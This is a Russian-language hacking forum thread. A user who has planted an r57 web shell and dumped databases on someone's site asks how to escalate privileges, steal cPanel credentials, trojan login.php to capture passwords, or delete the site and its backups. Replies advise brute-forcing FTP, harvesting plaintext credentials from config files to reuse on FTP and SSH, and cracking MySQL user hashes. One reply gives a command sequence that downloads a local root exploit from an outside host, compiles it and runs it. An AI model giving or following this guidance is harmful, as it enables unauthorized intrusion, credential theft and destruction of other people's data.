Всем привет. Дано: залит классический r57, стянуты дампы баз данных, частично расшифрованы. Пароли админов похоже слишком сложные, неделя расшифровки результатов не дала. Посоветуйте, что можно сделать дальше... хотел протроянить login.php форума или сайта, что бы он пароли высылал нешифрованые но шелу не хватает прав. В общем вопрос такой, как повысить шелл в правах либо как при этих условиях взломать cpanel (только не брутфорс, скорее всего не поможет) либо как тупо удалить всё из public_html и каталога выше (полюбому там бэкапы баз есть) Скриптик то у меня для удаления конечно есть, но как ему дать достаточно прав для меня тоже вопрос. И ещё, может быть есть способы открыть фтп?
Во-первых, в r57 есть функция фтп брута, во-вторых, повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
uname -a http://my_lybimii_bug_track.com/sploit/ wget http://my_lybimii_bug_track.com/sploit/1.c gcc 1.c -o haked ./haked id (0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Да знаю!!Да бы не разводить флейм, надо root или права на Public_html!Кста, а /etc/passwd можно удалить без прав рута, ну ты дал!
первое не походит по тому что конфиги то недоступны, этот сайт один из многих у хочтера. Хостер довольно крупный и мне уж точно сейчас не по зубам. По части второго, спасибо пищу, почитаю... cmd? Нет, на сервере не могу. 1.c - какой споилт, будет ли он там компилироваться? gcc 1.c -o haked ./haked id ^^^что это означает? Извините по никсу слаб, просто появилась задача, стараюсь её реализовать. Не хватит прав
почитай конфиги сайта, если это не хомяк, то скорее всего есть скрипты для работы с бд ищи в них название конфигурационного файла (config.php,config.inc,config.inc.php,dbconf.php и т.д.) читай этот файл от бд там пароль и логин в чистом виде... пробуй их на другие сервисы на фтп или ssh могут прокатить... если у тебя будет доступ к базе mysql (хотя врядли если это крутой хостер) то узнавай хеши паролей юзеров бд и бруть их, а потом также пробуй их к ssh и фтп...
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются. пароли от конфигов тоже никуда кроме как к базам не подходят.
мдя... причем тут админы я тебе про базу mysql говорил табличка там есть такая user так вот там хеши зашифрованные алгоритмами mysql или mysql5 (cоответственно 16 и 40 знаков) а если ниче не помогает, то тока рутать (ну или фтп брутить с помощью brutus aet например) тыб сначала написал какая там ось ядро и т.д. в шелле выполни комманду uname -a и результаты в студию
цель это получение пароля от cpanel. Дампы слиты но пароли админов не подбираются (вероятно просто длинные), так вот в виду невозможности расшифровки необходим полный дестрой =) Просто удалить всё, вместе с бэкапами. Шелу прав на это не хватает.
uname -a Linux targetsrv.ru 2.6.9-42.ELsmp #1 SMP Wed Jul 12 23:27:17 EDT 2006 i686 i686 i386 GNU/Linux прошу ЧИТАЙТЕ ВНИМАТЕЛЬНО!!! Я в самом начале говорил что шелл, залил. mysql базы посливал. Пароль которые получилось расшифровать расшифровал. Теперь задача, взять пароль от cpanel либо полный дестрой, папки этого пользователя на хостинге включая бэкапы файлов и public_html И ещё отдельный привет Dronga, держи своё мнение при себе! Ситуации бывают разные. А жизнь вообще тяжела и несправедлива!